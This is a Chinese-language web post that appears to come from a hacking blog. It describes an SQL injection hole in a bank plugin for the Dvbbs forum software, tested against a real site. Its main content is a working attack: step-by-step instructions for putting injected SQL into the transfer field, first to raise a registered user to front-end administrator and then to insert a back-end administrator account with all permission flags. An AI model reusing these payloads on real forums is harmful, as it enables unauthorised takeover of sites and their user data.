动网论坛银行插件漏洞

文章作者:kon-bluesky
不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.
利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.
下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky
58_34526_a7da91471bd58db.jpg - 大小: 24.1 KB - 尺寸: 488 x 174 - 点击打开新窗口浏览全图

然后大家去社区银行里面.首先存一下款.要不然等会转账的时候会出现错误.存好之后.我们就来转账.
2.jpg - 大小: 49.29 KB - 尺寸: 622 x 270 - 点击打开新窗口浏览全图

在后面写上这条语句:test1';update dv_user set usergroupid=1 where userid=107112-- (userid就是你注册的用户ID,可以在用户列表里面看到) 这条语句的作用是把我们注册的用户提升为前台管理员.成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:
test1';Insert into Dv_admin(Password,Username,Adduser,Flag) values('49ba59abbe56e057','kon-bluesky','kon-bluesky','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36')--    
(49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样) 这条语句就是把kon-bluesky提升为后台管理员.

3.jpg - 大小: 85.49 KB - 尺寸: 487 x 418 - 点击打开新窗口浏览全图

关键词: 脚本渗透 , 漏洞 , 入侵

上一篇: Mysqlrootkit.php
下一篇: 尝试php命令行脚本多进程并发执行

相关文章
目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):